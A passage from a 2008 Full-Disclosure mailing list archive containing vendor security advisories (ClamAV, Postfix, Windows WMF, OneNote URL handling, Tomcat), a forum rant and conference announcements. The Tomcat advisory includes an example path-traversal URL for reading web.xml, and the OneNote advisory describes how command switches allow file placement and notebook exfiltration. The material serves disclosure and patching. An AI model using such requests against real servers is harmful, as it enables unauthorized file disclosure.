836b5f5b80d43e8deccc568c4ab13d29 2008.0/x86_64/clamav-milter-0.94-1.1mdv2008.0.x86_64.rpm 3fcf6e4b59d7b7478f54293fcd2ee645 2008.0/x86_64/clamd-0.94-1.1mdv2008.0.x86_64.rpm 2ce435e797aff93eaa669bddd07c80f5 2008.0/x86_64/klamav-0.44-1.1mdv2008.0.x86_64.rpm 24e564b09aa2da8b990341faaaed48e7 2008.0/x86_64/lib64clamav5-0.94-1.1mdv2008.0.x86_64.rpm f3aad5e06843c9b3e2d02ad200061e0e 2008.0/x86_64/lib64clamav-devel-0.94-1.1mdv2008.0.x86_64.rpm fff2dc6701ea1a7e458e0c7305d7c4b4 2008.0/SRPMS/clamav-0.94-1.1mdv2008.0.src.rpm 790d1fafeb9d594a4ef8b0815f3262b2 2008.0/SRPMS/klamav-0.44-1.1mdv2008.0.src.rpm Mandriva Linux 2008.1: d14bdc1a6449db5cc1503bd4d333e8a2 2008.1/i586/clamav-0.94-1.1mdv2008.1.i586.rpm f95700d3c9261ad949057511d3b39387 2008.1/i586/clamav-db-0.94-1.1mdv2008.1.i586.rpm 8cab4ed20a974f34a94072792c453abf 2008.1/i586/clamav-milter-0.94-1.1mdv2008.1.i586.rpm ff0295e9d76ee583ea0c0fb89b40ba6a 2008.1/i586/clamd-0.94-1.1mdv2008.1.i586.rpm 4cfb25dc61c3d00d16d443ac8d71c052 2008.1/i586/klamav-0.44-1.1mdv2008.1.i586.rpm 9abb23ad9e2ec08d6b6148061e7b3e24 2008.1/i586/libclamav5-0.94-1.1mdv2008.1.i586.rpm 20e9761482e5765c383342ddb643dfb9 2008.1/i586/libclamav-devel-0.94-1.1mdv2008.1.i586.rpm 23368e250d024f656f712f5a0b5bc3bc 2008.1/SRPMS/clamav-0.94-1.1mdv2008.1.src.rpm 51eb63fc4854a6c46825a39402147437 2008.1/SRPMS/klamav-0.44-1.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: d88cf6080b3a47b047eaf3e827be42b1 2008.1/x86_64/clamav-0.94-1.1mdv2008.1.x86_64.rpm c321391a081c4984d8d1d4af58fbffbf 2008.1/x86_64/clamav-db-0.94-1.1mdv2008.1.x86_64.rpm 70de3af2a8328433a6f4d72f61a660f5 2008.1/x86_64/clamav-milter-0.94-1.1mdv2008.1.x86_64.rpm 4fe6e4e61ed33e410c42a4fdcb2777da 2008.1/x86_64/clamd-0.94-1.1mdv2008.1.x86_64.rpm 358502ecc7472c604ddf3866babed94c 2008.1/x86_64/klamav-0.44-1.1mdv2008.1.x86_64.rpm 1bb70d6027a0dcaafe8c912da2564c01 2008.1/x86_64/lib64clamav5-0.94-1.1mdv2008.1.x86_64.rpm 72a395c410a865baf22039dd818cfb5d 2008.1/x86_64/lib64clamav-devel-0.94-1.1mdv2008.1.x86_64.rpm 23368e250d024f656f712f5a0b5bc3bc 2008.1/SRPMS/clamav-0.94-1.1mdv2008.1.src.rpm 51eb63fc4854a6c46825a39402147437 2008.1/SRPMS/klamav-0.44-1.1mdv2008.1.src.rpm Corporate 3.0: e93f24829e71cbb4c6973212a4cb5c1d corporate/3.0/i586/clamav-0.94-0.1.C30mdk.i586.rpm 01110930b9a011ec3c2b869fd530ca85 corporate/3.0/i586/clamav-db-0.94-0.1.C30mdk.i586.rpm 8b324ab6f153cd7759970419835c5ba1 corporate/3.0/i586/clamav-milter-0.94-0.1.C30mdk.i586.rpm da5919de6d6af23a15f01d2c10395816 corporate/3.0/i586/clamd-0.94-0.1.C30mdk.i586.rpm a4744ab31ab50dd4a6d59ef8e2210577 corporate/3.0/i586/libclamav5-0.94-0.1.C30mdk.i586.rpm 2006ba6b8290823b02845ccca756bda5 corporate/3.0/i586/libclamav-devel-0.94-0.1.C30mdk.i586.rpm df19860c88af93ae2275e4b527bda574 corporate/3.0/SRPMS/clamav-0.94-0.1.C30mdk.src.rpm Corporate 3.0/X86_64: 061e89b360cb74b9698f0b666b01343e corporate/3.0/x86_64/clamav-0.94-0.1.C30mdk.x86_64.rpm 7ec8f85eb723e4b9bd2dca8d5795e126 corporate/3.0/x86_64/clamav-db-0.94-0.1.C30mdk.x86_64.rpm f63a221901108574637658fed82f57cf corporate/3.0/x86_64/clamav-milter-0.94-0.1.C30mdk.x86_64.rpm c4c56997738d082e962e861a7405c210 corporate/3.0/x86_64/clamd-0.94-0.1.C30mdk.x86_64.rpm c471da2ab426a2577f3888da6bf77df9 corporate/3.0/x86_64/lib64clamav5-0.94-0.1.C30mdk.x86_64.rpm 041c58953f77a64e20b9edeb1221c73c corporate/3.0/x86_64/lib64clamav-devel-0.94-0.1.C30mdk.x86_64.rpm df19860c88af93ae2275e4b527bda574 corporate/3.0/SRPMS/clamav-0.94-0.1.C30mdk.src.rpm Corporate 4.0: 84f0a6d8c90804b06c8074cb9a7ab621 corporate/4.0/i586/c-icap-client-210205-5.4.20060mlcs4.i586.rpm 23afb1e453c7077a251b661d5dea808a corporate/4.0/i586/c-icap-modules-210205-5.4.20060mlcs4.i586.rpm a75af557cae299cd1f8a278edbc9d64d corporate/4.0/i586/c-icap-server-210205-5.4.20060mlcs4.i586.rpm a8edffaa0508064336ee47ea3b7d99be corporate/4.0/i586/clamav-0.94-0.1.20060mlcs4.i586.rpm 30dc5ee939826f645dab35982c73573a corporate/4.0/i586/clamav-db-0.94-0.1.20060mlcs4.i586.rpm fd93ef196d826ef6f25cbc6a03b57a19 corporate/4.0/i586/clamav-milter-0.94-0.1.20060mlcs4.i586.rpm 6e47ad078994176a38981d4f74bd9287 corporate/4.0/i586/clamd-0.94-0.1.20060mlcs4.i586.rpm d50fdc2cb0cf4164f285f5ef95765181 corporate/4.0/i586/libc-icap0-210205-5.4.20060mlcs4.i586.rpm 95c97459c5f13eba7abfc1c596c38b80 corporate/4.0/i586/libc-icap0-devel-210205-5.4.20060mlcs4.i586.rpm 1c99feb33772166e3df3b75c4df89e1c corporate/4.0/i586/libclamav5-0.94-0.1.20060mlcs4.i586.rpm dd88b657b21629ad8fe1c771342e33ef corporate/4.0/i586/libclamav-devel-0.94-0.1.20060mlcs4.i586.rpm b159933a3ce58f7b391a19ebdf75942b corporate/4.0/i586/php-clamav-0.12a-8.4.20060mlcs4.i586.rpm 62d716a3300fb873d47434d641f4f7ad corporate/4.0/SRPMS/c-icap-210205-5.4.20060mlcs4.src.rpm dd77e56abc4257fb59763d82d3117298 corporate/4.0/SRPMS/clamav-0.94-0.1.20060mlcs4.src.rpm bd5a8bd48df696c6418005569e4d1507 corporate/4.0/SRPMS/php-clamav-0.12a-8.4.20060mlcs4.src.rpm Corporate 4.0/X86_64: 6e8ff3ecc2727cb734bcf68180a3fb4c corporate/4.0/x86_64/c-icap-client-210205-5.4.20060mlcs4.x86_64.rpm f3d8f2f3bd1042d689270bf00ef3f252 corporate/4.0/x86_64/c-icap-modules-210205-5.4.20060mlcs4.x86_64.rpm f5a52f8c00b6d80f69f93ec0fe87de26 corporate/4.0/x86_64/c-icap-server-210205-5.4.20060mlcs4.x86_64.rpm 276bb5c9a8aec3e352c355afa0481c72 corporate/4.0/x86_64/clamav-0.94-0.1.20060mlcs4.x86_64.rpm f4f71f69e34638e62b1c04697dc05bac corporate/4.0/x86_64/clamav-db-0.94-0.1.20060mlcs4.x86_64.rpm 6dc12eff63f75ea48f2451f59698fba1 corporate/4.0/x86_64/clamav-milter-0.94-0.1.20060mlcs4.x86_64.rpm 3cd934074f8d9154f7056e89ba431fde corporate/4.0/x86_64/clamd-0.94-0.1.20060mlcs4.x86_64.rpm 4e5bd806c6d28ccf575041515c39b3bd corporate/4.0/x86_64/lib64c-icap0-210205-5.4.20060mlcs4.x86_64.rpm 5f81b7013bc43fca8d9d3a3e9f7373c9 corporate/4.0/x86_64/lib64c-icap0-devel-210205-5.4.20060mlcs4.x86_64.rpm fa45fbd491723c28d3a431d75d98391b corporate/4.0/x86_64/lib64clamav5-0.94-0.1.20060mlcs4.x86_64.rpm 199b59888f0db12c05a669d0d9f12688 corporate/4.0/x86_64/lib64clamav-devel-0.94-0.1.20060mlcs4.x86_64.rpm dc9a2900fa35e6eed3b65fead293b161 corporate/4.0/x86_64/php-clamav-0.12a-8.4.20060mlcs4.x86_64.rpm 62d716a3300fb873d47434d641f4f7ad corporate/4.0/SRPMS/c-icap-210205-5.4.20060mlcs4.src.rpm dd77e56abc4257fb59763d82d3117298 corporate/4.0/SRPMS/clamav-0.94-0.1.20060mlcs4.src.rpm bd5a8bd48df696c6418005569e4d1507 corporate/4.0/SRPMS/php-clamav-0.12a-8.4.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIxyZYmqjQ0CJFipgRAjkUAJ4qLTbQKMwCijUO8yt3hZeKPIZxsQCfQuKL s8pgnFPooN4iKraqvbGh3cA= =TNvu -----END PGP SIGNATURE----- From xploitable at gmail.com Wed Sep 10 07:14:25 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 10 Sep 2008 07:14:25 +0100 Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity' In-Reply-To: <7ff145960809092121la2d567ey6bd109865e869d43@mail.gmail.com> References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com> <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com> <8a6b8e350809071426ia10f292r2c98ebe74fc398ad@mail.gmail.com> <4b6ee9310809071457r31d967f2y16116fbccf4a2677@mail.gmail.com> <21600.1220886960@turing-police.cc.vt.edu> <4b6ee9310809092002r1b1be75bmd7a26ae32d8f1dce@mail.gmail.com> <7ff145960809092121la2d567ey6bd109865e869d43@mail.gmail.com> Message-ID: <4b6ee9310809092314m3356282cu4488b067f1c234f7@mail.gmail.com> On Wed, Sep 10, 2008 at 5:21 AM, Jim Popovitch <yahoo at jimpop.com> wrote: > On Tue, Sep 9, 2008 at 23:02, n3td3v <xploitable at gmail.com> wrote: >> I'm talking about artificially ramping up something and giving a false >> impression... > > You are talking/writing about two different things. Ramping up > something is different than falsely describing about ramping up > something. I watched the video, I did not get the impression that > Marcus was speaking about creating a falsehood. > > -Jim P. > I think he is going to lie to a president about the severity of the threat, just like somebody lied to Bush about the severity of the threat posed by Iraq. Don't make the same mistake twice, learn our lessons from Iraq and move forward. Lying about the threat isn't cool, just so you can get money from the next administration. If the next president starts thinking cyber security is an imminent threat to national security, then who knows where we are going to end up. An unnecessary cyber war with other countries or cyber terrorists or both, all because of a greedy Marcus Sachs and a false pretence? Please don't do it Marcus, don't do it Marcus!!! Setting up US-CERT was enough for you to achieve Marcus, now leave it at that and go take up a new hobbie. Don't ramp up cyber security as a national security item. Definitions of fraud on the Web: http://www.google.com/search?hl=en&safe=off&pwst=1&defl=en&q=define:fraud&sa=X&oi=glossary_definition&ct=title All the best, n3td3v From VR-Subscription-noreply at assurent.com Tue Sep 9 18:30:34 2008 From: VR-Subscription-noreply at assurent.com (VR-Subscription-noreply at assurent.com) Date: Tue, 9 Sep 2008 13:30:34 -0400 (EDT) Subject: [Full-disclosure] Assurent VR - Microsoft Windows Graphics Rendering Engine WMF Parsing Buffer Overflow Message-ID: <20080909173034.70C6268019F@sticky.vrt.telus.com> Microsoft Windows Graphics Rendering Engine WMF Parsing Buffer Overflow Assurent ID: FSC20080909-12 1. Affected Software Digital Image Suite 2006 Forefront Client Security 1.0 Microsoft Office 2003 SP2, SP3 Microsoft Office PowerPoint Viewer 2003 Microsoft Windows XP prior to SP3 Microsoft Windows Vista Microsoft Windows Server 2003 Microsoft Windows Server 2008 Microsoft Works 8 Reference: http://www.microsoft.com/ 2. Vulnerability Summary A vulnerability has been discovered in the Graphics Rendering Engine (GRE) component of Microsoft Windows. Specifically this vulnerability is exposed by the Microsoft Windows GDI+ subsystem. The vulnerability is created by an error in parsing certain Windows Metafile (WMF) files, a standard image file format used by many commonly-used software applications. 3. Vulnerability Analysis A remote attacker may exploit the vulnerability by sending a malicious WMF file to the target system and enticing the target user to view or preview it. A successful code execution attempt will result in arbitrary code to be executed within the security privileges of the currently logged in user. An unsuccessful attack attempt will result in abnormal termination of the program used for opening the malicious file. Applications affected by this vulnerability include Windows Explorer, Internet Explorer, Microsoft Paint, Windows Picture and Fax Viewer, and various Microsoft Office products. Note that the vulnerable file may be embedded inside other formats in the form of OLE objects, allowing the malicious file to appear as RTF files, Microsoft Office documents, or other formats. 4. Vulnerability Detection Assurent has confirmed the vulnerability in: Digital Image Suite 2006 Forefront Client Security 1 Microsoft Office 2003 SP2, SP3 Microsoft Office PowerPoint Viewer 2003 Microsoft Windows XP prior to SP3 Microsoft Windows Vista Microsoft Windows Server 2003 Microsoft Windows Server 2008 Microsoft Works 8 5. Workaround Apply the vendor patch, remove file associations to WMF files to avoid opening them, disable thumbnail previews while browsing files, or block the downloading of WMF resources from untrusted networks. 6. Vendor Response Microsoft has released a bulletin addressing this vulnerability. Reference: http://www.microsoft.com/technet/security/Bulletin/MS08-052.mspx 7. Disclosure Timeline 2007-03-20 Reported to vendor 2007-03-22 Initial vendor response 2008-09-09 Coordinated public disclosure 8. Credits Vulnerability Research Team, Assurent Secure Technologies, a TELUS company 9. References CVE: CVE-2008-3014 Vendor: MS08-052 10. About Assurent VRS Assurent's Vulnerability Research Service (VRS) for security product vendors, and Threat Protection Programs (TPP) for MSPs and enterprise security teams, help to eliminate the significant costs incurred by security product vendors, MSPs, and enterprise security teams in responding to and managing critical new security vulnerabilities and other threats including worm & virus outbreaks and other malware. The VRS and TPP services are real-time feeds providing subscribers with detailed analysis of the top security vulnerabilities, focused on the specific needs of each group of customers. http://www.assurent.com/index.php?id=17 From brett.moore at insomniasec.com Tue Sep 9 23:16:43 2008 From: brett.moore at insomniasec.com (Brett Moore) Date: Wed, 10 Sep 2008 10:16:43 +1200 Subject: [Full-disclosure] Insomnia : ISVA-080910.1 - MS Office OneNote URL Handling Vulnerability Message-ID: <005c01c912c9$c161d330$44257990$@moore@insomniasec.com> __________________________________________________________________ Insomnia Security Vulnerability Advisory: ISVA-080910.1 ___________________________________________________________________ Name: MS Office OneNote URL Handling Vulnerability Released: 10 September 2008 Vendor Link: http://http://office.microsoft.com/onenote Affected Products: MS Office Onenote 2007 MS Office 2003 and 2007 have vulnerable components Original Advisory: http://www.insomniasec.com/advisories/ISVA-080910.1.htm Researcher: Brett Moore, Insomnia Security http://www.insomniasec.com ___________________________________________________________________ _______________ Description _______________ OneNote is included as part of office 2007, and provides an easy way to store, manage, and share information. OneNote installs a URL Handler under the registry key HKEY_CLASSES_ROOT\OneNote with an open command specified as C:\PROGRA~1\MICROS~2\Office12\ONENOTE.EXE /hyperlink "%1" Due to the URL Handler, OneNote can be started from Internet Explorer through a URI reference of onenote://onenotefile Where onenotefile is a locally hosted file, or a file accessible through a UNC/WebDav share. The instance of onenote started will executed through the IEUSER.EXE process running under the currently logged in user. OneNote is one of the few Microsoft installed applications that does NOT PROMPT the user, before executing from the URL. Through the use of command line switches passed to OneNote from a URL, we found two exploitation scenarios. _______________ Details _______________ - File Transfer to Client - OneNote accepts a command switch to specify the location of the local cache directory. By specifying this switch on the URL It is possible to specify an arbitrary location on the client, which will be used to cache the opened notebooks. If a notebook is loaded from a remote share, a local copy will be created under the cache directory. When OneNote caches the notebook it makes a local copy of any binary files that are embedded inside the notebook. This allows the placement of binary files in a 'semi arbitrary' location that can then be used in conjunction with social engineering emails, or other attacks that require the knowledge of the location of a file. There may also be other attack vectors through the placement of specially named files within search paths. - Theft of Users OneNote Notebooks - OneNote accepts a command switch to specify the location of the backup directory. It is possible to specify a SMB share location on a remote server, which will be used to backup the notebooks. This results in copies of all opened notebooks been sent to the remote share. _______________ Solution _______________ Microsoft have released a security update to address this issue; http://www.microsoft.com/technet/security/bulletin/ms08-055.mspx _______________ Legals _______________ The information is provided for research and educational purposes only. Insomnia Security accepts no liability in any form whatsoever for any direct or indirect damages associated with the use of this information. ___________________________________________________________________ Insomnia Security Vulnerability Advisory: ISVA-080910.1 ___________________________________________________________________ From markt at apache.org Wed Sep 10 11:06:27 2008 From: markt at apache.org (Mark Thomas) Date: Wed, 10 Sep 2008 11:06:27 +0100 Subject: [Full-disclosure] [SECURITY] CVE-2008-2938 - Apache Tomcat information disclosure vulnerability - Updated Message-ID: <48C79C23.3090108@apache.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2008-2938: Apache Tomcat information disclosure vulnerability - Updated Severity: Important (was moderate) Vendor: The Apache Software Foundation Versions Affected: Tomcat 4.1.0 to 4.1.37 Tomcat 5.5.0 to 5.5.26 Tomcat 6.0.0 to 6.0.16 The unsupported Tomcat 3.x, 4.0.x and 5.0.x versions may be also affected Description (new information): Further investigation of CVE-2008-2938 has shown that the vulnerability also exists only with URIEncoding="UTF-8" set on the connector. In these configurations arbitrary files in the docBase for an application, including files such as web.xml, may be disclosed. Users should also be aware that this vulnerability will apply when processing requests with UTF-8 body encoding and useBodyEncodingForURI="true" Mitigation: 6.0.x users should upgrade to 6.0.18 5.5.x users should upgrade to 5.5.27 4.1.x users should obtain the latest source from svn or apply this patch: http://svn.apache.org/viewvc?view=rev&revision=681065 Example: http://www.target.com/contextpath/%c0%ae%c0%ae/WEB-INF/web.xml Credit: This additional information was discovered by the Apache Tomcat security team. References: http://tomcat.apache.org/security.html Mark Thomas -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkjHnCMACgkQb7IeiTPGAkMoLQCg2PxS09CpZGI9t+QcdifSfMh8 CHcAoOSRAPOzAFH5hx1w8jxOBthrAKEJ =Fi0E -----END PGP SIGNATURE----- From walter.kovacs at rocketmail.com Wed Sep 10 11:33:00 2008 From: walter.kovacs at rocketmail.com (Walter Kovacs) Date: Wed, 10 Sep 2008 03:33:00 -0700 (PDT) Subject: [Full-disclosure] Don't Let Your Kids Go Online Unsupervised Message-ID: <112885.89005.qm@web59716.mail.ac4.yahoo.com> RJ Carter discusses online predators, child safety, and parent resources in regards to the online activity of unsupervised children on YouTube and other sites. For more info: http://therjcarter.wordpress.com/youtube-pedophile-playground/ http://rjcarter.blogspot.com Irish282, LoganSperman2, YouTube, Pedophile Playground -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080910/128c0e14/attachment.html From 2008 at hack.lu Wed Sep 10 12:51:08 2008 From: 2008 at hack.lu (hack.lu 2008) Date: Wed, 10 Sep 2008 13:51:08 +0200 Subject: [Full-disclosure] Hack.lu 2008 update Message-ID: <48C7B4AC.7060805@hack.lu> Hi all, Hack.lu 2008 is getting closer and closer. Find hereafter the line-up of speakers and talks for this year's event: Saumil Shah - Browser Exploits - A new model for Browser security Roelof Temmingh - Investigating individuals and groups using open source intelligence Paul Craig - Hacking Internet Kiosks Adrian Pastor - Cracking into embedded devices and beyond! Julien Lenoir, Christophe Devaux - Browsers Rootkits F.W.J. van Geelkerken - Egregious use of TOR servers Abstract Jean-Baptiste B?drune - Analysis of an undocumented network protocol Damien Aumaitre - A little journey inside Windows memory Philippe Teuwen - How to make smartcards resistant to hackers' lightsabers? Patrick Hof, Jens Liebchen - Bridging the Gap between the Enterprise and You - or - Who's the JBoss now? Ezequiel David Gutesman - gFuzz: An Instrumented Web Application Fuzzing Environment Frank Boldewin - Rustock.C - When a myth comes true Joffrey Czarny - Go outside citrix context Sebastian Wilhelm Maier - "The end of the internet" aka "Self replicating malware on home routers" Philippe Langlois - Immersed network discovery and attacks, specifics of telecom Core Network (CN SS7/SIGTRAN) insider attacks Dumitru Codreanu - Server-side virus scanning Mihai Chiriac - Anti-virus 2.0 - "Compilers in disguise" Eric Michel Leblond, Vincent Deffontaines, Sebastien Tricaud - User Authentication at the Firewall level Eric Filiol - Malware of the future: when mathematics works for the dark side You can read more about the talks here: http://www.hack.lu/index.php/hl/2008/schedConf/presentations The final agenda will follow during the next days. There will also be a wiki at wiki.hack.lu for the Hackcamp that runs in parallel to the hack.lu conference. Feel free to register at: http://www.hack.lu/index.php/hl/2008/schedConf/registration For hotel reservation please fill out the form you can find at: www.hack.lu and send it to the hotel. Stay tuned to the website and wiki as there will be regular updates. Hope to see you in october in Luxembourg cheers the CSRRT-Lu team From deepsec at deepsec.net Wed Sep 10 11:51:32 2008 From: deepsec at deepsec.net (DeepSec Conference Vienna) Date: Wed, 10 Sep 2008 12:51:32 +0200 (CEST) Subject: [Full-disclosure] DeepSec 2008 - Conference Schedule Message-ID: <20080910105132.EFF89DF20B@bazaar.foomatic.at> The DeepSec In Depth Security Conference is happy to announce the preliminary schedule for this year's event from November 11th to 14th in Vienna, Austria. The schedule which can be found at https://depsec.net/schedule offers bleeding edge talks from international speakers on topics including botnet analysis, web application security, malware detection, legal and administrative issues, secure coding and code review, hardware an firmware attacks, and more. Registration is open at: https://deepsec.net/register/ In addition to the two day conference we offer two days of in-depth workshops on selected topics: ? Improving Code with Destructive Data (Heikki Kortti and Jukka Taimisto) ? Security Audit and Hardening of Java based Software (Marc Schoenefeld) ? The Exploit Laboratory (Saumil Udayan Shah) ? Design and Implementation of Security Awareness Campaigns (Stefan Schumacher) ? Advanced Malware Deobfuscation (Scott Lambert) ? Protocol and Traffic Analysis for Snort Signature (Matt Jonkman) ? Secure Application Coding for Enterprise Software (Vimal Patel) List of speakers with presentations: ? Achim Reckeweg ; Sun Microsystems ; Germany ? Alex Stamos ; iSEC Partners ; USA ? Alexander Kornbrust ; Red Database Security GmbH ; Germany ? Andrea Monti ; Studio Legale Monti ; Italy ? Arrigo Triulzi ; Independent Security Consultant ; Italy ? Chema Alonso, Jos? Parada ; Inform?tica 64 ; Spain ? Daniel Mende, Simon Rich ; ERNW GmbH ; Germany ? Dr. Anton Chuvakin ; LogLogic, Inc ; USA ? Haroon Meer ; SensePost ; South Africa ? Heikki Kortti and Jukka Taimisto ; Codenomicon Ltd ; Finland ? Jason Steer ; IronPort, a division of Cisco Systems ; UK ? Joe Stewart ; SecureWorks ; USA ? Jos? Nazario ; Arbor Networks ; USA ? Kurt Grutzmacher ; Pacific Gas & Electric ; USA ? Luciano Bello ; CITEFA/Si6 , Debian Project ; Argentina ? Marc Schoenefeld ; University of Bamberg ; Germany ? Matt Jonkman ; Emerging Threats.net (formerly bleedingthreats.net) ; USA ? Morgan Marquis-Boire ; Security-Assessment.com ; New Zealand ? Neelay S. Shah ; Foundstone Inc., A Division of McAfee ; USA ? Paolo Perego ; Spike Reply srl, Owasp Orizon Project leader ; Italy ? Peter Panholzer ; SEC Consult Unternehmensberatung GmbH ; Austria ? Rafael Dominguez Vega ; MWR InfoSecurity ; UK ? Saumil Udayan Shah ; CEO, Net-Square ; India ? Scott Lambert, Jason Geffner ; Microsoft, NGSSoftware Ltd. ; USA ? Sharon Conheady ; Ernst & Young ; UK ? Shreeraj Shah ; Blueinfy Solutions ; India ? Simon Roses Femerling ; Microsoft ; Spain ? Stefan Schumacher ; Kaishakunin.com ; Germany ? Stefano Zanero ; Politecnico di Milano TU ? Claudio Criscione ; SecureNetwork Srl ; Italy ? VimalPatel ; Founder & Director, Blueinfy Solutions Pvt. Ltd. ; India ? Vincenzo Iozzo ; Secure Network ; Italy ? Yarochkin Fedor/Meder Kydyraliev ; guard-info ; Kyrgyzstan ? Yiannis Pavlosoglou ; Ounce Labs / PhD, OWASP Project Leader ; United Kingdom ? fukami ; SektionEins GmbH ; Germany DeepSec Organisation Team. https://deepsec.net/contact From security at mandriva.com Wed Sep 10 19:51:01 2008 From: security at mandriva.com (security at mandriva.com) Date: Wed, 10 Sep 2008 12:51:01 -0600 Subject: [Full-disclosure] [ MDVSA-2008:190 ] postfix Message-ID: <E1KdUmL-0001hh-9r@titan.mandriva.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:190 http://www.mandriva.com/security/ _______________________________________________________________________ Package : postfix Date : September 10, 2008 Affected: 2008.0, 2008.1 _______________________________________________________________________ Problem Description: A vulnerability in Postfix 2.4 and later was discovered, when running on Linux kernel 2.6, where a local user could cause a denial of service due to Postfix leaking the epoll file descriptor when executing non-Postfix commands (CVE-2008-3889). The updated packages have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3889 http://www.postfix.org/announcements/20080902.html _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: c0bf5d528d5d41dcd2d20ebdb34d0cda 2008.0/i586/libpostfix1-2.4.5-2.2mdv2008.0.i586.rpm fa944c0d7f0cbea926f535d510bf55d1 2008.0/i586/postfix-2.4.5-2.2mdv2008.0.i586.rpm 198798461aa8d36de69167dabf12e753 2008.0/i586/postfix-ldap-2.4.5-2.2mdv2008.0.i586.rpm 58655741a221fa54a33566568f3b4b82 2008.0/i586/postfix-mysql-2.4.5-2.2mdv2008.0.i586.rpm a38a78d39fe49cfa5dd71ee4f5a8a2bd 2008.0/i586/postfix-pcre-2.4.5-2.2mdv2008.0.i586.rpm 6d26bd16aaab2333dc84a86b0595b31d 2008.0/i586/postfix-pgsql-2.4.5-2.2mdv2008.0.i586.rpm da3f4b0d105461a2c0cc9d0ffdb8afbc 2008.0/SRPMS/postfix-2.4.5-2.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 028de47e6f9dd2a18be1afbfbfcc7b35 2008.0/x86_64/lib64postfix1-2.4.5-2.2mdv2008.0.x86_64.rpm 4e790bb1f1cb14e0eb008e8188c7d7f3 2008.0/x86_64/postfix-2.4.5-2.2mdv2008.0.x86_64.rpm a843dc0ab9e22c27f1a83d3dd01139fd 2008.0/x86_64/postfix-ldap-2.4.5-2.2mdv2008.0.x86_64.rpm 9e50dfda594b6e6c270d001f5c020086 2008.0/x86_64/postfix-mysql-2.4.5-2.2mdv2008.0.x86_64.rpm b27f29aa607246fa343244e783080dce 2008.0/x86_64/postfix-pcre-2.4.5-2.2mdv2008.0.x86_64.rpm 90992c9e66cbfa61adcc8f25af56bad0 2008.0/x86_64/postfix-pgsql-2.4.5-2.2mdv2008.0.x86_64.rpm da3f4b0d105461a2c0cc9d0ffdb8afbc 2008.0/SRPMS/postfix-2.4.5-2.2mdv2008.0.src.rpm Mandriva Linux 2008.1: f7e093f905a77ffff051dd1f1719e70c 2008.1/i586/libpostfix1-2.5.1-2.2mdv2008.1.i586.rpm 17806bd3791473f79636f6e96aac3b16 2008.1/i586/postfix-2.5.1-2.2mdv2008.1.i586.rpm ccbd6e6f134329f298da2e73ee924624 2008.1/i586/postfix-ldap-2.5.1-2.2mdv2008.1.i586.rpm 5e7501b1c226168794559a0c945c51ce 2008.1/i586/postfix-mysql-2.5.1-2.2mdv2008.1.i586.rpm 44482a44ec46d379cc90ec71b8d3da40 2008.1/i586/postfix-pcre-2.5.1-2.2mdv2008.1.i586.rpm ed1ddf0451d015b1c85d09d438406c04 2008.1/i586/postfix-pgsql-2.5.1-2.2mdv2008.1.i586.rpm d450d39e8073c6c9f1c9003f6189cf1a 2008.1/SRPMS/postfix-2.5.1-2.2mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: f9a52469d5700428f6a2c606d2846299 2008.1/x86_64/lib64postfix1-2.5.1-2.2mdv2008.1.x86_64.rpm 5cb84c0ebe53a446efd208da355a9b4b 2008.1/x86_64/postfix-2.5.1-2.2mdv2008.1